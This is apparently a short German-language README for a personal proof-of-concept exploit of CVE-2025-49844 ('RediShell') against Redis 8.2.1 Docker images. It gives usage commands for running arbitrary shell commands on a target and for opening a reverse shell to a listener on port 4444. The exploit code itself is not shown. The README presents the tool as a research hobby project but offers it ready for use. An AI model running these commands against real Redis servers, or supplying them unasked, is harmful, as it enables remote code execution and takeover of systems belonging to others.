
Proof-of-concept for CVE-2025-49844
Mein persönlicher Proof-of-Concept für CVE-2025-49844, auch bekannt als RediShell.
Unterstützte Ziel-Builds:
redis:8.2.1-alpine Docker-Imageredis:8.2.1-bookworm Docker-ImageEs ist etwas klobig, wahrscheinlich nicht so gut wie das von Wiz Research. Trotzdem bin ich froh, dass ich es zum Laufen gebracht habe, bevor die Hexacon 2025-Vorträge hochgeladen wurden, und ich hatte eine großartige Zeit, es zu untersuchen.
Einweg-Shell-Befehle ausführen:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
Mit einer Reverse-Shell verbinden:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444